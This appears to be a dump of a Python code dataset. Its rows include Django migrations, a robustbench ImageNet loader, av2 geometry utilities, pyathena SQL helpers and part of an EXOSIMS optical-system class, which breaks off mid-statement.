content
stringlengths
0
1.05M
origin
stringclasses
2 values
type
stringclasses
2 values
# -*- coding: utf-8 -*- # Generated by Django 1.10.4 on 2017-05-12 05:48 from __future__ import unicode_literals import datetime from django.db import migrations, models from django.utils.timezone import utc class Migration(migrations.Migration): dependencies = [ ('trans', '0003_auto_20170512_0537'), ] operations = [ migrations.AlterField( model_name='contentversion', name='create_time', field=models.DateTimeField(default=datetime.datetime(2017, 5, 12, 5, 48, 31, 49055, tzinfo=utc)), ), migrations.AlterField( model_name='contest', name='slug', field=models.CharField(max_length=10, unique=True), ), migrations.AlterField( model_name='versionparticle', name='create_time', field=models.DateTimeField(default=datetime.datetime(2017, 5, 12, 5, 48, 31, 52323, tzinfo=utc)), ), ]
nilq/baby-python
python
# Generated by Django 2.2.6 on 2019-10-28 21:28 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('base', '0021_delete_pnotes'), ] operations = [ migrations.AlterField( model_name='note', name='modified', field=models.DateTimeField(blank=True, null=True), ), ]
nilq/baby-python
python
""" This file is based on the code from https://github.com/pytorch/vision/blob/master/torchvision/datasets/folder.py. """ from torchvision.datasets.vision import VisionDataset import torch import torch.utils.data as data import torchvision.transforms as transforms from PIL import Image import os import os.path import sys import json def make_custom_dataset(root, path_imgs, cls_dict): with open(path_imgs, 'r') as f: fnames = f.readlines() with open(cls_dict, 'r') as f: class_to_idx = json.load(f) images = [(os.path.join(root, c.split('\n')[0]), class_to_idx[c.split('/')[0]]) for c in fnames] return images class CustomDatasetFolder(VisionDataset): """A generic data loader where the samples are arranged in this way: :: root/class_x/xxx.ext root/class_x/xxy.ext root/class_x/xxz.ext root/class_y/123.ext root/class_y/nsdf3.ext root/class_y/asd932_.ext Args: root (string): Root directory path. loader (callable): A function to load a sample given its path. extensions (tuple[string]): A list of allowed extensions. both extensions and is_valid_file should not be passed. transform (callable, optional): A function/transform that takes in a sample and returns a transformed version. E.g, ``transforms.RandomCrop`` for images. target_transform (callable, optional): A function/transform that takes in the target and transforms it. is_valid_file (callable, optional): A function that takes path of an Image file and check if the file is a valid_file (used to check of corrupt files) both extensions and is_valid_file should not be passed. Attributes: classes (list): List of the class names. class_to_idx (dict): Dict with items (class_name, class_index). samples (list): List of (sample path, class_index) tuples targets (list): The class_index value for each image in the dataset """ def __init__(self, root, loader, extensions=None, transform=None, target_transform=None, is_valid_file=None): super(CustomDatasetFolder, self).__init__(root) self.transform = transform self.target_transform = target_transform classes, class_to_idx = self._find_classes(self.root) samples = make_custom_dataset(self.root, 'robustbench/data/imagenet_test_image_ids.txt', 'robustbench/data/imagenet_class_to_id_map.json') if len(samples) == 0: raise (RuntimeError("Found 0 files in subfolders of: " + self.root + "\n" "Supported extensions are: " + ",".join(extensions))) self.loader = loader self.extensions = extensions self.classes = classes self.class_to_idx = class_to_idx self.samples = samples self.targets = [s[1] for s in samples] def _find_classes(self, dir): """ Finds the class folders in a dataset. Args: dir (string): Root directory path. Returns: tuple: (classes, class_to_idx) where classes are relative to (dir), and class_to_idx is a dictionary. Ensures: No class is a subdirectory of another. """ if sys.version_info >= (3, 5): # Faster and available in Python 3.5 and above classes = [d.name for d in os.scandir(dir) if d.is_dir()] else: classes = [d for d in os.listdir(dir) if os.path.isdir(os.path.join(dir, d))] classes.sort() class_to_idx = {classes[i]: i for i in range(len(classes))} return classes, class_to_idx def __getitem__(self, index): """ Args: index (int): Index Returns: tuple: (sample, target) where target is class_index of the target class. """ path, target = self.samples[index] sample = self.loader(path) if self.transform is not None: sample = self.transform(sample) if self.target_transform is not None: target = self.target_transform(target) return sample, target, path def __len__(self): return len(self.samples) IMG_EXTENSIONS = ('.jpg', '.jpeg', '.png', '.ppm', '.bmp', '.pgm', '.tif', '.tiff', '.webp') def pil_loader(path): # open path as file to avoid ResourceWarning (https://github.com/python-pillow/Pillow/issues/835) with open(path, 'rb') as f: img = Image.open(f) return img.convert('RGB') def accimage_loader(path): import accimage try: return accimage.Image(path) except IOError: # Potentially a decoding problem, fall back to PIL.Image return pil_loader(path) def default_loader(path): from torchvision import get_image_backend if get_image_backend() == 'accimage': return accimage_loader(path) else: return pil_loader(path) class CustomImageFolder(CustomDatasetFolder): """A generic data loader where the images are arranged in this way: :: root/dog/xxx.png root/dog/xxy.png root/dog/xxz.png root/cat/123.png root/cat/nsdf3.png root/cat/asd932_.png Args: root (string): Root directory path. transform (callable, optional): A function/transform that takes in an PIL image and returns a transformed version. E.g, ``transforms.RandomCrop`` target_transform (callable, optional): A function/transform that takes in the target and transforms it. loader (callable, optional): A function to load an image given its path. is_valid_file (callable, optional): A function that takes path of an Image file and check if the file is a valid_file (used to check of corrupt files) Attributes: classes (list): List of the class names. class_to_idx (dict): Dict with items (class_name, class_index). imgs (list): List of (image path, class_index) tuples """ def __init__(self, root, transform=None, target_transform=None, loader=default_loader, is_valid_file=None): super(CustomImageFolder, self).__init__(root, loader, IMG_EXTENSIONS if is_valid_file is None else None, transform=transform, target_transform=target_transform, is_valid_file=is_valid_file) self.imgs = self.samples if __name__ == '__main__': data_dir = '/home/scratch/datasets/imagenet/val' imagenet = CustomImageFolder(data_dir, transforms.Compose([ transforms.Resize(256), transforms.CenterCrop(224), transforms.ToTensor()])) torch.manual_seed(0) test_loader = data.DataLoader(imagenet, batch_size=5000, shuffle=True, num_workers=30) x, y, path = next(iter(test_loader)) with open('path_imgs_2.txt', 'w') as f: f.write('\n'.join(path)) f.flush()
nilq/baby-python
python
# <Copyright 2022, Argo AI, LLC. Released under the MIT license.> """Geometric utilities for manipulation point clouds, rigid objects, and vector geometry.""" from typing import Tuple, Union import numpy as np from scipy.spatial.transform import Rotation from av2.utils.constants import PI from av2.utils.typing import NDArrayBool, NDArrayFloat, NDArrayInt def wrap_angles(angles: NDArrayFloat, period: float = PI) -> NDArrayFloat: """Map angles (in radians) from domain [-∞, ∞] to [0, π). Args: angles: (N,) array of angles period: Length of the domain. Returns: Angles (in radians) mapped to the interval [0, π). """ # Map angles to [0, ∞]. angles = np.abs(angles) # Calculate floor division and remainder simultaneously. divs, mods = np.divmod(angles, period) # Select angles which exceed specified period. angle_complement_mask = np.nonzero(divs) # Take set complement of `mods` w.r.t. the set [0, π]. # `mods` must be nonzero, thus the image is the interval [0, π). angles[angle_complement_mask] = period - mods[angle_complement_mask] return angles def xy_to_uv(xy: NDArrayFloat, width: int, height: int) -> NDArrayFloat: """Convert coordinates in R^2 (x,y) to texture coordinates (u,v) in R^2. (x,y) coordinates (u,v) coordinates (+y) (0,0) - - - - - (+u) | | | -> | | | (+x) - - - - (0,0) (+v) The xy to uv coordinate transformation is shown above. We model pixel coordinates using the uv texture mapping convention. NOTE: Ellipses indicate any number of proceeding dimensions allowed for input. Args: xy: (...,2) array of coordinates in R^2 (x,y). width: Texture grid width. height: Texture grid height. Returns: (...,2) array of texture / pixel coordinates. """ x = xy[..., 0] y = xy[..., 1] u = width - x - 1 v = height - y - 1 return np.stack((u, v), axis=-1) def quat_to_mat(quat_wxyz: NDArrayFloat) -> NDArrayFloat: """Convert a quaternion to a 3D rotation matrix. NOTE: SciPy uses the scalar last quaternion notation. Throughout this repository, we use the scalar FIRST convention. Args: quat_wxyz: (...,4) array of quaternions in scalar first order. Returns: (...,3,3) 3D rotation matrix. """ # Convert quaternion from scalar first to scalar last. quat_xyzw = quat_wxyz[..., [1, 2, 3, 0]] mat: NDArrayFloat = Rotation.from_quat(quat_xyzw).as_matrix() return mat def mat_to_quat(mat: NDArrayFloat) -> NDArrayFloat: """Convert a 3D rotation matrix to a scalar _first_ quaternion. NOTE: SciPy uses the scalar last quaternion notation. Throughout this repository, we use the scalar FIRST convention. Args: mat: (...,3,3) 3D rotation matrices. Returns: (...,4) Array of scalar first quaternions. """ # Convert quaternion from scalar first to scalar last. quat_xyzw: NDArrayFloat = Rotation.from_matrix(mat).as_quat() quat_wxyz: NDArrayFloat = quat_xyzw[..., [3, 0, 1, 2]] return quat_wxyz def mat_to_xyz(mat: NDArrayFloat) -> NDArrayFloat: """Convert a 3D rotation matrix to a sequence of _extrinsic_ rotations. In other words, 3D rotation matrix and returns a sequence of Tait-Bryan angles representing the transformation. Reference: https://en.wikipedia.org/wiki/Euler_angles#Rotation_matrix Reference: https://en.wikipedia.org/wiki/Euler_angles#Tait%E2%80%93Bryan_angles_2 Args: mat: (...,3,3) Rotation matrix. Returns: (...,3) Tait-Bryan angles (in radians) formulated for a sequence of extrinsic rotations. """ xyz_rad: NDArrayFloat = Rotation.from_matrix(mat).as_euler("xyz", degrees=False) return xyz_rad def xyz_to_mat(xyz_rad: NDArrayFloat) -> NDArrayFloat: """Convert a sequence of rotations about the (x,y,z) axes to a 3D rotation matrix. In other words, this function takes in a sequence of Tait-Bryan angles and returns a 3D rotation matrix which represents the sequence of rotations. Computes: R = Rz(z) * Ry(y) * Rx(x) Reference: https://en.wikipedia.org/wiki/Euler_angles#Tait%E2%80%93Bryan_angles_2 Reference: https://en.wikipedia.org/wiki/Euler_angles#Rotation_matrix Args: xyz_rad: (...,3) Tait-Bryan angles (in radians) of extrinsic rotations. Returns: (...,3,3) 3D Rotation matrix. """ mat: NDArrayFloat = Rotation.from_euler("xyz", xyz_rad, degrees=False).as_matrix() return mat def cart_to_sph(xyz: NDArrayFloat) -> NDArrayFloat: """Convert Cartesian coordinates into spherical coordinates. This function converts a set of points in R^3 to its spherical representation in R^3. NOTE: Ellipses indicate any number of proceeding dimensions allowed for input. Args: xyz: (...,3) Array of points (x,y,z) in Cartesian space. Returns: (...,3) Array in spherical space. [Order: (azimuth, inclination, radius)]. """ x = xyz[..., 0] y = xyz[..., 1] z = xyz[..., 2] hypot_xy = np.hypot(x, y) radius = np.hypot(hypot_xy, z) inclination = np.arctan2(z, hypot_xy) azimuth = np.arctan2(y, x) return np.stack((azimuth, inclination, radius), axis=-1) def cart_to_hom(cart: NDArrayFloat) -> NDArrayFloat: """Convert Cartesian coordinates into Homogenous coordinates. This function converts a set of points in R^N to its homogeneous representation in R^(N+1). Args: cart: (M,N) Array of points in Cartesian space. Returns: NDArrayFloat: (M,N+1) Array in Homogeneous space. """ M, N = cart.shape hom: NDArrayFloat = np.ones((M, N + 1)) hom[:, :N] = cart return hom def hom_to_cart(hom: NDArrayFloat) -> NDArrayFloat: """Convert Homogenous coordinates into Cartesian coordinates. This function converts a set of points in R^(N+1) to its Cartesian representation in R^N. Args: hom: (M,N+1) Array of points in Homogeneous space. Returns: NDArrayFloat: (M,N) Array in Cartesian space. """ N = hom.shape[1] - 1 cart: NDArrayFloat = hom[:, :N] / hom[:, N : N + 1] return cart def crop_points( points: Union[NDArrayFloat, NDArrayInt], lower_bound_inclusive: Tuple[float, ...], upper_bound_exclusive: Tuple[float, ...], ) -> Tuple[NDArrayFloat, NDArrayFloat]: """Crop points to a lower and upper boundary. NOTE: Ellipses indicate any number of proceeding dimensions allowed for input. Args: points: (...,n) n-dimensional array of points. lower_bound_inclusive: (n,) Coordinates lower bound (inclusive). upper_bound_exclusive: (n,) Coordinates upper bound (exclusive). Raises: ValueError: If dimensions between xyz and the provided bounds don't match. Returns: (...,n) Tuple of cropped points and the corresponding boolean mask. """ # Gather dimensions. n_dim = points.shape[-1] lb_dim = len(lower_bound_inclusive) ub_dim = len(upper_bound_exclusive) # Ensure that the logical operations will broadcast. if n_dim != lb_dim or n_dim != ub_dim: raise ValueError(f"Dimensions n_dim {n_dim} must match both lb_dim {lb_dim} and ub_dim {ub_dim}") # Ensure that the lower bound less than or equal to the upper bound for each dimension. if not all(lb < ub for lb, ub in zip(lower_bound_inclusive, upper_bound_exclusive)): raise ValueError("Lower bound must be less than or equal to upper bound for each dimension") # Lower bound mask. lb_mask = np.greater_equal(points, lower_bound_inclusive) # Upper bound mask. ub_mask = np.less(points, upper_bound_exclusive) # Bound mask. is_valid_points = np.logical_and(lb_mask, ub_mask).all(axis=-1) return points[is_valid_points], is_valid_points def compute_interior_points_mask(points_xyz: NDArrayFloat, cuboid_vertices: NDArrayFloat) -> NDArrayBool: r"""Compute the interior points mask for the cuboid. Reference: https://math.stackexchange.com/questions/1472049/check-if-a-point-is-inside-a-rectangular-shaped-area-3d 5------4 |\\ |\\ | \\ | \\ 6--\\--7 \\ \\ \\ \\ \\ l \\ 1-------0 h e \\ || \\ || e n \\|| \\|| i g \\2------3 g t width. h h. t. Args: points_xyz: (N,3) Array representing a point cloud in Cartesian coordinates (x,y,z). cuboid_vertices: (8,3) Array representing 3D cuboid vertices, ordered as shown above. Returns: (N,) An array of boolean flags indicating whether the points are interior to the cuboid. """ # Get three corners of the cuboid vertices. vertices: NDArrayFloat = np.stack((cuboid_vertices[6], cuboid_vertices[3], cuboid_vertices[1])) # (3,3) # Choose reference vertex. # vertices and choice of ref_vertex are coupled. ref_vertex = cuboid_vertices[2] # (3,) # Compute orthogonal edges of the cuboid. uvw = ref_vertex - vertices # (3,3) # Compute signed values which are proportional to the distance from the vector. sim_uvw_points = points_xyz @ uvw.transpose() # (N,3) sim_uvw_ref = uvw @ ref_vertex # (3,) # Only care about the diagonal. sim_uvw_vertices: NDArrayFloat = np.diag(uvw @ vertices.transpose()) # type: ignore # (3,) # Check 6 conditions (2 for each of the 3 orthogonal directions). # Refer to the linked reference for additional information. constraint_a = np.logical_and(sim_uvw_ref <= sim_uvw_points, sim_uvw_points <= sim_uvw_vertices) constraint_b = np.logical_and(sim_uvw_ref >= sim_uvw_points, sim_uvw_points >= sim_uvw_vertices) is_interior: NDArrayBool = np.logical_or(constraint_a, constraint_b).all(axis=1) return is_interior
nilq/baby-python
python
# Generated by Django 3.0.7 on 2020-07-28 14:00 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('disdata', '0028_auto_20200728_0924'), ] operations = [ migrations.AlterField( model_name='disease', name='vaccination_regiment', field=models.CharField(blank=True, max_length=255), ), ]
nilq/baby-python
python
# -*- coding: utf-8 -*- from __future__ import absolute_import from __future__ import unicode_literals import functools import logging import threading import re import uuid import tenacity from past.builtins import xrange from tenacity import (after_log, retry_if_exception, stop_after_attempt, wait_exponential) from pyathena import DataError, OperationalError from pyathena.model import AthenaCompression _logger = logging.getLogger(__name__) PATTERN_OUTPUT_LOCATION = re.compile(r'^s3://(?P<bucket>[a-zA-Z0-9.\-_]+)/(?P<key>.+)$') def parse_output_location(output_location): match = PATTERN_OUTPUT_LOCATION.search(output_location) if match: return match.group('bucket'), match.group('key') else: raise DataError('Unknown `output_location` format.') def get_chunks(df, chunksize=None): rows = len(df) if rows == 0: return if chunksize is None: chunksize = rows elif chunksize <= 0: raise ValueError('Chunk size argument must be greater than zero') chunks = int(rows / chunksize) + 1 for i in xrange(chunks): start_i = i * chunksize end_i = min((i + 1) * chunksize, rows) if start_i >= end_i: break yield df[start_i:end_i] def reset_index(df, index_label=None): df.index.name = index_label if index_label else 'index' try: df.reset_index(inplace=True) except ValueError as e: raise ValueError('Duplicate name in index/columns: {0}'.format(e)) def as_pandas(cursor, coerce_float=False): from pandas import DataFrame names = [metadata[0] for metadata in cursor.description] return DataFrame.from_records(cursor.fetchall(), columns=names, coerce_float=coerce_float) def to_sql_type_mappings(col): import pandas as pd col_type = pd._lib.infer_dtype(col, skipna=True) if col_type == 'datetime64' or col_type == 'datetime': return 'TIMESTAMP' elif col_type == 'timedelta': return 'INT' elif col_type == "timedelta64": return 'BIGINT' elif col_type == 'floating': if col.dtype == 'float32': return 'FLOAT' else: return 'DOUBLE' elif col_type == 'integer': if col.dtype == 'int32': return 'INT' else: return 'BIGINT' elif col_type == 'boolean': return 'BOOLEAN' elif col_type == "date": return 'DATE' elif col_type == 'bytes': return 'BINARY' elif col_type in ['complex', 'time']: raise ValueError('{0} datatype not supported'.format(col_type)) return 'STRING' def to_sql(df, name, conn, location, schema='default', index=False, index_label=None, chunksize=None, if_exists='fail', compression=None, flavor='spark', type_mappings=to_sql_type_mappings): # TODO Supports orc, avro, json, csv or tsv format # TODO Supports partitioning if if_exists not in ('fail', 'replace', 'append'): raise ValueError('`{0}` is not valid for if_exists'.format(if_exists)) if compression is not None and not AthenaCompression.is_valid(compression): raise ValueError('`{0}` is not valid for compression'.format(compression)) import pyarrow as pa import pyarrow.parquet as pq bucket_name, key_prefix = parse_output_location(location) bucket = conn.session.resource('s3', region_name=conn.region_name, **conn._client_kwargs).Bucket(bucket_name) cursor = conn.cursor() retry_config = conn.retry_config table = cursor.execute(""" SELECT table_name FROM information_schema.tables WHERE table_schema = '{schema}' AND table_name = '{table}' """.format(schema=schema, table=name)).fetchall() if if_exists == 'fail': if table: raise OperationalError('Table `{0}.{1}` already exists.'.format(schema, name)) elif if_exists == 'replace': if table: cursor.execute(""" DROP TABLE {schema}.{table} """.format(schema=schema, table=name)) objects = bucket.objects.filter(Prefix=key_prefix) if list(objects.limit(1)): objects.delete() if index: reset_index(df, index_label) for chunk in get_chunks(df, chunksize): table = pa.Table.from_pandas(chunk) buf = pa.BufferOutputStream() pq.write_table(table, buf, compression=compression, flavor=flavor) retry_api_call(bucket.put_object, config=retry_config, Body=buf.getvalue().to_pybytes(), Key=key_prefix + str(uuid.uuid4())) ddl = generate_ddl(df=df, name=name, location=location, schema=schema, compression=compression, type_mappings=type_mappings) cursor.execute(ddl) def get_column_names_and_types(df, type_mappings): return [ (str(df.columns[i]), type_mappings(df.iloc[:, i])) for i in xrange(len(df.columns)) ] def generate_ddl(df, name, location, schema='default', compression=None, type_mappings=to_sql_type_mappings): ddl = 'CREATE EXTERNAL TABLE IF NOT EXISTS `{0}`.`{1}` (\n'.format(schema, name) ddl += ',\n'.join([ '`{0}` {1}'.format(c[0], c[1]) for c in get_column_names_and_types(df, type_mappings) ]) ddl += '\n)\n' ddl += 'STORED AS PARQUET\n' ddl += "LOCATION '{0}'\n".format(location) if compression: ddl += "TBLPROPERTIES ('parquet.compress'='{0}')\n".format(compression.upper()) return ddl def synchronized(wrapped): """The missing @synchronized decorator https://git.io/vydTA""" _lock = threading.RLock() @functools.wraps(wrapped) def _wrapper(*args, **kwargs): with _lock: return wrapped(*args, **kwargs) return _wrapper class RetryConfig(object): def __init__(self, exceptions=('ThrottlingException', 'TooManyRequestsException'), attempt=5, multiplier=1, max_delay=100, exponential_base=2): self.exceptions = exceptions self.attempt = attempt self.multiplier = multiplier self.max_delay = max_delay self.exponential_base = exponential_base def retry_api_call(func, config, logger=None, *args, **kwargs): retry = tenacity.Retrying( retry=retry_if_exception( lambda e: getattr(e, 'response', {}).get( 'Error', {}).get('Code', None) in config.exceptions if e else False), stop=stop_after_attempt(config.attempt), wait=wait_exponential(multiplier=config.multiplier, max=config.max_delay, exp_base=config.exponential_base), after=after_log(logger, logger.level) if logger else None, reraise=True ) return retry(func, *args, **kwargs)
nilq/baby-python
python
# -*- coding: utf-8 -*- import astropy.units as u import numpy as np import os.path import astropy.io.fits as fits import numbers from operator import itemgetter import scipy.interpolate import scipy.optimize class OpticalSystem(object): """Optical System class template This class contains all variables and methods necessary to perform Optical System Definition Module calculations in exoplanet mission simulation. Args: \*\*specs: User specified values. Attributes: obscurFac (float): Obscuration factor due to secondary mirror and spiders shapeFac (float): Shape factor of the unobscured pupil area, so that shapeFac * pupilDiam^2 * (1-obscurFac) = pupilArea pupilDiam (astropy Quantity): Entrance pupil diameter in units of m pupilArea (astropy Quantity): Entrance pupil area in units of m2 telescopeKeepout (astropy Quantity): Telescope keepout angle in units of deg attenuation (float): Non-coronagraph attenuation, equal to the throughput of the optical system without the coronagraph elements intCutoff (astropy Quantity): Maximum allowed integration time in units of day Npix (float): Number of noise pixels Ndark (float): Number of dark frames used dMagLim (float): Fundamental delta magnitude limit haveOcculter (boolean): Boolean signifying if the system has an occulter F0 (callable(lam)): Spectral flux density IWA (astropy Quantity): Fundamental Inner Working Angle in units of arcsec OWA (astropy Quantity): Fundamental Outer Working Angle in units of arcsec dMagLim (float): Fundamental limiting delta magnitude scienceInstruments (list of dicts): All science instrument attributes (variable) Imager (dict): Dictionary containing imaging camera attributes. Default to scienceInstruments[0] Spectro (dict): Dictionary containing spectrograph attributes. Default to scienceInstruments[-1] starlightSuppressionSystems (list of dicts): All starlight suppression system attributes (variable) ImagerSyst (dict): Dictionary containing imaging coronagraph attributes. Default to starlightSuppressionSystems[0] SpectroSyst (dict): Dictionary containing spectroscopy coronagraph attributes. Default to starlightSuppressionSystems[-1] Common Science Instrument Attributes: type (string): Instrument type (e.g. imaging, spectro) lam (astropy Quantity): Central wavelength in units of nm deltaLam (astropy Quantity): Bandwidth in units of nm BW (float): Bandwidth fraction pitch (astropy Quantity): Pixel pitch in units of m focal (astropy Quantity): Focal length in units of m idark (astropy Quantity): Dark current rate in units of 1/s texp (astropy Quantity): Exposure time per frame in units of s sread (float): Detector readout noise CIC (float): Clock-induced-charge ENF (float): Excess noise factor Gem (float): Electron multiplication gain Rs (float): Spectral resolving power Ns (float): Number of spectral elements in each band QE (callable(lam)): Quantum efficiency (must be callable - can be lambda function, scipy.interpolate.interp2d object, etc.) with input wavelength (astropy Quantity). Common Starlight Suppression System Attributes: type (string): System type (e.g. internal, external, hybrid), should also contain the type of science instrument it can be used with (e.g. imaging, spectro) throughput (callable(lam, WA)): System throughput (must be callable - can be lambda, function, scipy.interpolate.interp2d object, etc.) with inputs wavelength (astropy Quantity) and angular separation/working angle (astropy Quantity). contrast (callable(lam, WA)): System contrast curve (must be callable - can be lambda, function, scipy.interpolate.interp2d object, etc.) with inputs wavelength (astropy Quantity) and angular separation/working angle (astropy Quantity). IWA (astropy Quantity): Inner working angle in units of arcsec OWA (astropy Quantity): Outer working angle in units of arcsec PSF (callable(lam, WA)): Point spread function - 2D ndarray of values, normalized to 1 at the core (must be callable - can be lambda, function, scipy.interpolate.interp2d object, etc.) with inputs wavelength (astropy Quantity) and angular separation/working angle (astropy Quantity). Note: normalization means that all throughput effects must be contained in the throughput attribute. samp (astropy Quantity): Sampling of PSF in units of arcsec (per pixel) ohTime (astropy Quantity): Overhead time in units of days imagTimeMult (float): Imaging time multiplier charTimeMult (float): Characterization time multiplier """ _modtype = 'OpticalSystem' _outspec = {} def __init__(self,obscurFac=0.1,shapeFac=np.pi/4,pupilDiam=4,telescopeKeepout=45,\ attenuation=0.6,intCutoff=50,Npix=14.3,Ndark=10,dMagLim=20,scienceInstruments=None,\ lam=500,BW=0.2,pitch=13e-6,focal=240,idark=9e-5,texp=1e3,sread=3,CIC=0.0013,\ ENF=1,Gem=1,Rs=70,QE=0.9,starlightSuppressionSystems=None,throughput=1e-2,\ contrast=1e-9,PSF=np.ones((3,3)),samp=10,ohTime=1,imagTimeMult=1,\ charTimeMult=1,IWA=None,OWA=None,**specs): #load all values with defaults self.obscurFac = float(obscurFac) # obscuration factor self.shapeFac = float(shapeFac) # shape factor self.pupilDiam = float(pupilDiam)*u.m # entrance pupil diameter self.pupilArea = (1-self.obscurFac)*self.shapeFac*self.pupilDiam**2\ # entrance pupil area self.telescopeKeepout = float(telescopeKeepout)*u.deg\ # keepout angle in degrees self.attenuation = float(attenuation) # non-coronagraph attenuation factor self.intCutoff = float(intCutoff)*u.d # integration time cutoff self.Npix = float(Npix) # number of noise pixels self.Ndark = float(Ndark) # number of dark frames used self.dMagLim = float(dMagLim) # fundamental delta magnitude limit # Spectral flux density ~9.5e7 [ph/s/m2/nm] @ 500nm # F0(lambda) function of wavelength, based on Traub et al. 2016 (JATIS): self.F0 = lambda lam: 1e4*10**(4.01-(lam.to('nm').value-550)/770)*u.ph/u.s/u.m**2/u.nm # loop through all science Instruments (must have one defined) assert scienceInstruments, "No science isntrument defined." self.scienceInstruments = scienceInstruments self._outspec['scienceInstruments'] = [] for ninst,inst in enumerate(self.scienceInstruments): assert isinstance(inst,dict), "Science instruments must be defined as dicts." assert inst.has_key('type') and isinstance(inst['type'],basestring),\ "All science instruments must have key type." #populate with values that may be filenames (interpolants) inst['QE'] = inst.get('QE',QE) self._outspec['scienceInstruments'].append(inst.copy()) # When provided, always use bandwidth (nm) instead of bandwidth fraction. inst['lam'] = float(inst.get('lam',lam))*u.nm # central wavelength (nm) inst['deltaLam'] = float(inst.get('deltaLam',inst['lam'].value\ *inst.get('BW',BW)))*u.nm # bandwidth (nm) inst['BW'] = float(inst['deltaLam']/inst['lam']) # bandwidth fraction # Default lam and BW updated with values from first instrument if ninst == 0: lam, BW = inst.get('lam').value, inst.get('BW') # Loading detector specifications inst['pitch'] = float(inst.get('pitch',pitch))*u.m # pixel pitch inst['focal'] = float(inst.get('focal',focal))*u.m # focal length inst['idark'] = float(inst.get('idark',idark))/u.s # dark-current rate inst['texp'] = float(inst.get('texp',texp))*u.s # exposure time per frame inst['sread'] = float(inst.get('sread',sread)) # detector readout noise inst['CIC'] = float(inst.get('CIC',CIC)) # clock-induced-charge inst['ENF'] = float(inst.get('ENF',ENF)) # excess noise factor inst['Gem'] = float(inst.get('Gem',Gem)) # e- multiplication gain inst['Rs'] = float(inst.get('Rs',Rs)) # spectral resolving power inst['Ns'] = float(inst['Rs']*inst['BW']) if 'spec' in inst['type'] \ .lower() else 1. # number of spectral elements in each band # quantum efficiency if inst.has_key('QE'): if isinstance(inst['QE'],basestring): assert os.path.isfile(inst['QE']),\ "%s is not a valid file."%inst['QE'] tmp = fits.open(inst['QE']) #basic validation here for size and wavelength #inst['QE'] = lambda or interp elif isinstance(inst['QE'],numbers.Number): inst['QE'] = lambda lam, QE=float(inst['QE']): QE/u.photon #populate detector specifications to outspec for att in inst.keys(): if att not in ['QE']: dat = inst[att] self._outspec['scienceInstruments'][ninst][att] = dat.value \ if isinstance(dat,u.Quantity) else dat # loop through all starlight suppression systems (must have one defined) assert starlightSuppressionSystems, "No starlight suppression systems defined." self.starlightSuppressionSystems = starlightSuppressionSystems self.haveOcculter = False self._outspec['starlightSuppressionSystems'] = [] for nsyst,syst in enumerate(self.starlightSuppressionSystems): assert isinstance(syst,dict),\ "Starlight suppression systems must be defined as dicts." assert syst.has_key('type') and isinstance(syst['type'],basestring),\ "All starlight suppression systems must have key type." #populate with values that may be filenames (interpolants) syst['throughput'] = syst.get('throughput',throughput) syst['contrast'] = syst.get('contrast',contrast) syst['PSF'] = syst.get('PSF',PSF) self._outspec['starlightSuppressionSystems'].append(syst.copy()) #set an occulter, for an external or hybrid system if syst['type'].lower() in ('external', 'hybrid'): self.haveOcculter = True #handle inf OWA if syst.get('OWA') == 0: syst['OWA'] = np.Inf #check for throughput if isinstance(syst['throughput'],basestring): pth = os.path.normpath(os.path.expandvars(syst['throughput'])) assert os.path.isfile(pth),\ "%s is not a valid file."%pth dat = fits.open(pth)[0].data assert len(dat.shape) == 2 and 2 in dat.shape, "Wrong "\ "throughput data shape." WA = dat[0] if dat.shape[0] == 2 else dat[:,0] T = dat[1] if dat.shape[0] == 2 else dat[:,1] assert np.all(T>=0), "Throughput must be positive." Tinterp = scipy.interpolate.interp1d(WA, T, kind='cubic',\ fill_value=np.nan, bounds_error=False) syst['throughput'] = lambda lam, WA: Tinterp(WA) # Calculate max throughput Tmax = scipy.optimize.minimize(lambda x:-syst['throughput'](lam,x),\ WA[np.argmax(T)],bounds=((np.min(WA),np.max(WA)),) ) if Tmax.success: Tmax = -Tmax.fun[0] else: print "Warning: failed to find maximum of throughput "\ "interpolant for starlight suppression system "\ "#%d"%(nsyst+1) Tmax = np.Tmax(T) # Calculate IWA and OWA, defined as angular separations # corresponding to 50% of maximum throughput WA_min = scipy.optimize.fsolve(lambda x:syst['throughput']\ (lam,x)-Tmax/2.,np.min(WA))[0]; WA_max = np.max(WA)-scipy.optimize.fsolve(lambda x:syst['throughput']\ (lam,np.max(WA)-x)-Tmax/2.,0.)[0]; syst['IWA'] = max(np.min(WA),syst.get('IWA',WA_min)) syst['OWA'] = min(np.max(WA),syst.get('OWA',WA_max)) elif isinstance(syst['throughput'],numbers.Number): assert syst['throughput']>0, "Throughput must be positive." syst['throughput'] = lambda lam, WA, T=float(syst['throughput']): T #check for contrast if isinstance(syst['contrast'],basestring): pth = os.path.normpath(os.path.expandvars(syst['contrast'])) assert os.path.isfile(pth),\ "%s is not a valid file."%pth dat = fits.open(pth)[0].data assert len(dat.shape) == 2 and 2 in dat.shape, "Wrong "\ "contrast data shape." WA = dat[0] if dat.shape[0] == 2 else dat[:,0] C = dat[1] if dat.shape[0] == 2 else dat[:,1] assert np.all(C>=0), "Contrast must be positive." Cinterp = scipy.interpolate.interp1d(WA, C, kind='cubic',\ fill_value=np.nan, bounds_error=False) syst['contrast'] = lambda lam, WA: Cinterp(WA) # Constraining IWA and OWA syst['IWA'] = max(np.min(WA),syst.get('IWA',np.min(WA))) syst['OWA'] = min(np.max(WA),syst.get('OWA',np.max(WA))) elif isinstance(syst['contrast'],numbers.Number): assert syst['contrast']>0, "Contrast must be positive." syst['contrast'] = lambda lam, WA, C=float(syst['contrast']): C #check for PSF if isinstance(syst['PSF'],basestring): pth = os.path.normpath(os.path.expandvars(syst['PSF'])) assert os.path.isfile(pth),\ "%s is not a valid file."%pth hdr = fits.open(pth)[0].header dat = fits.open(pth)[0].data assert len(dat.shape) == 2, "Wrong PSF data shape." assert np.any(dat), "PSF must be != 0" syst['PSF'] = lambda lam, WA, P=dat: P if hdr.get('SAMPLING') is not None: syst['samp'] = hdr.get('SAMPLING') else: assert np.any(syst['PSF']), "PSF must be != 0" syst['PSF'] = lambda lam, WA, P=np.array(syst['PSF']).astype(float): P #default IWA/OWA if not specified or calculated if not(syst.get('IWA')): syst['IWA'] = IWA if IWA else 0. if not(syst.get('OWA')): syst['OWA'] = OWA if OWA else np.Inf # Loading system specifications syst['IWA'] = float(syst.get('IWA'))*u.arcsec # inner WA syst['OWA'] = float(syst.get('OWA'))*u.arcsec # outer WA syst['samp'] = float(syst.get('samp',samp))*u.arcsec # PSF sampling syst['ohTime'] = 